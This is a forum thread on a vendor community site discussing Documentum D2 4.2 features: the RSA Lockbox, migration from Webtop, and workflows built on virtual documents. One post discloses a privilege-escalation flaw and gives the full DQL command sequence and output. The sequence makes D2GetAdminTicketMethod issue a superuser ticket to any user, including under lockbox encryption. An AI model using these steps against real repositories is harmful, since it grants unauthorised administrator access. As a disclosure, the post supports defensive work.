dm_surya
2 Bronze

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Hello,

Can you elaborate on how the Lockbox functions in a D2 environment and are there any specific use cases that lead to the choice of this product?

Read the below line the Release notes but couldn't make a whole lot of sense maybe a use case would help clarify:

"D2 uses RSA Lockbox to protect passwords and encryption keys against access by remote hosts"

Thank You.

0 Kudos
Elliott5
3 Argentium

Re: Re: Re: Ask the Expert: EMC Announced Documentum D2 4.2

We're currently using Webtop 6.7SP2 and looking to move to D2 4.2.  What features in Webtop aren't currrently available in D2?  What issues do we have to be careful of when we transition to D2?

Thanks

0 Kudos
Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

@plasher :

I just need some explanations about your needs ? Workflow and Lifecycle on Folder is not a typical use case with D2. May be you should consider using Virtual Document ?

0 Kudos
go4run
1 Copper

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Hi Surya,

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository that securely stores passwords and and other sensitive key manager configuration information. It is part or RSA Common Security Toolkit (CST) which is EMC internally implementation of RSA BSAFE(R) Share for Java Platform, see RSA BSAFE(R) Share for JavaTM Platform.

The EMC implementation of RSA BSAFE(R) enabling technology is intended for inclusion in EMC products allowing these products to meet the security requirements of our customers and to deliver differentiation through security. The CST libraries provide language-specific (C, C++, and Java) and platform-specific interfaces to a set of security services including authentication, authorization (role management), accountability (logging), cryptography, key management and secret protection which can be integrated by EMC product teams.

0 Kudos
PanfilovAB
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Goran Stepic wrote:

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository.....

And what about usecases?

0 Kudos
plasher
1 Copper

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Our intent is to send a work package (multiple documents at a time) through a workflow, which is one reason why the folder is being utilized.

0 Kudos
Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

In my opinion you should send a virtual document as work package. In this case you will be able to manage the lifecycle of each document of your Work Package.

D2 provides powerful option in order to manage VD and document inside your VD.

0 Kudos
Highlighted
PanfilovAB
4 Beryllium

Re: Re: Ask the Expert: EMC Announced Documentum D2 4.2


Goran Stepic wrote:

the RSA Lockbox is a software-specific (can be hardware too) encrypted repository.....

And what about usecases?

No comments? It's sad, let's read mine

The main D2 problem is it does not follow main concepts implemented in other Documentum products, for example: D2 does not use BOFv2 that makes it incompatible with other products, it actively uses docbase methods to perform some actions in web-interface (last time I had coded docbase method about 6 years ago), etc, etc. Technology level of D2 is somewhere between D5.3 and D6.0 . Another problem is D2 is not properly documented, actually this is a common problem for all Documentum products: when you install some product/application into repository you have no idea about what artifacts (objects types, users, groups, methods, etc) that product/application creates, moreover you have no idea about how to troubleshoot that product/application. So, before putting any Documentum product in production we always try to discover it functionality, and sometimes it brings a lot of fun sad (see also DCS Security Question), in November 2013 I discovered a vulnerability in D2 that allows any user to gain superuser privileges using D2GetAdminTicketMethod, it works by the following way:

1> create c6_method_return object set message='test'

2> go

object_created

--------------

00002ee280000e9b

(1 row affected)

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b'

3> go

...

(1 row affected)

1> select message from c6_method_return where r_object_id='00002ee280000e9b'

2> go

message

--------------

DM_TICKET=T0.....

(1 row affected)

After that user can use admin ticket to login to repository with superuser privileges.

And EMC instead of increasing technology level of their product had invented new square wheel - lockbox (note they even didn't consider to use dynamic groups):

20-03-2014 12-08-57 PM.png

Actually, EMC always misses a fact that encryption does not replaces security (see also Re: Certificate-based SSL configuration problem) - when D4.2 was released I had checked whether security vulnerability was fixed or not, and the answer was - not:

New D2 behavior with lockbox:

1> create c6_method_return object set message='test'

2> go

object_created

----------------

00002f0a8000291d

(1 row affected)

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d

3> -scope global -timeout 3600'

4> go

...

(1 row affected)

1> select message from c6_method_return where r_object_id='00002f0a8000291d'

2> go

message

----------------------------------------------------------------------------

AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2

hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b

aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+

44/DdBkvmi6A5v7+wF5+b0wR3saQFhxTX7Rfu/vVVFfvEehYAJNvDAvd/vtWvpJa+6N3Zmz+SZgH

q6x59int5a8CmSXhrZiflwcs+psMaOcStVyY/lYZGrGMdY4y9eEqn1psnQ+azA0cmfRZfn7uJJbc

KJmARVgaPFZN4FbEdbeu94PrNUU/lQrtKs+NaiwColY/WYEY8MlzkZhQ249koCHqgd07/TLdAX6l

9xCtvyIJf7cQeSi/4Xl4NlQ92O5RRFwPxIdHz0dhwSxnVptqGoRqMTcpw/NTJ5ldA5ZrhRnudAhi

iUt2b3PP0UBjVUjnpA9QD5sLR2DxUX4ysUbI2MDoYlzcnL5MYWLvEqq3K6gPXA8YJAgUwIIYbDqo

rXZEtet2cAl5zKCgDAqL6AqIPzcFn1sIDqy6p72D1kvQF4iFs2oQJZAT55j+C6SGcm4DoJYskpGg

/AwBiE0YFQX2zqjwqbSPcGSoIZDmoPZFELGjySl0xxjWcwW5HXh7194j73FW2FV82cMNZVIyf2/f

gWRMt+rw315VhwORReJYfMhibTBHR+CC+ySOetT7xvEMBVarfEOUHqGvs9hLZWYhgpBa2EgBKUZQ

jFBRe2SmK1E0aR7hmS1zbdATDJJGNhP9PrDLaHelunjgawEoAoMilY51EPgwqI2MuA==

(1 row affected)

here D2GetAdminTicketMethod returns encrypted ticked, and attacker need to perform another execution of D2GetAdminTicketMethod to decrypt ticket:

1> update c6_method_return object

2> set parameter_name[0]='-timeout',

3> set parameter_value[0]=(select message from c6_method_return

4> where r_object_id='00002f0a8000291d')

5> where r_object_id='00002f0a8000291d'

6> go

objects_updated

---------------

              1

(1 row affected)

[DM_QUERY_I_NUM_UPDATE]info:  "1 objects were affected by your UPDATE statement."

1> execute do_method with method='D2GetAdminTicketMethod',

2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d

3> -scope global'

4> go

...

(1 row affected)

1> select error from c6_method_return where r_object_id='00002f0a8000291d'

2> go

error

----------------------------------------------------------------------------

For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ

(1 row affected)

Julien_Fontaine
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

PanfilovAB you mark a point ...

Just a question, but I'm sure you already did it, did you open a new SR ?? What's the EMC answer to this security failure...

plasher What's your tought about VD for your need ?

0 Kudos
PanfilovAB
4 Beryllium

Re: Ask the Expert: EMC Announced Documentum D2 4.2

Jullien,

I thought here we were discussing D4.2 features, but not EMC support. And I do think I gave a complete answer about lockbox functionality (i.e. why it was introduced, why it does not work)  rather than put some marketing stuff.

0 Kudos